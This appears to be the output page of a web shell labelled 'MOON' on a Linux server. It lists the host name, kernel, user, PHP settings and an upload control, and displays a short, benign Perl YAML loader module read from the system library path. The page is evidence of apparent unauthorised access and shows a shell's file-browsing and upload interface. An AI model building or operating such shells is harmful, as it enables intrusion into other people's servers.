MOON
Server: Apache
System: Linux vps.itiansweb.com 4.18.0-553.123.2.el8_10.x86_64 #1 SMP Thu May 7 15:28:41 EDT 2026 x86_64
User: thriwe (1027)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: //lib64/perl5/vendor_perl/YAML/Loader/Syck.pm
package YAML::Loader::Syck;
use strict;

sub new { $_[0] }
sub load { shift; YAML::Syck::Load( $_[0] ) }

1;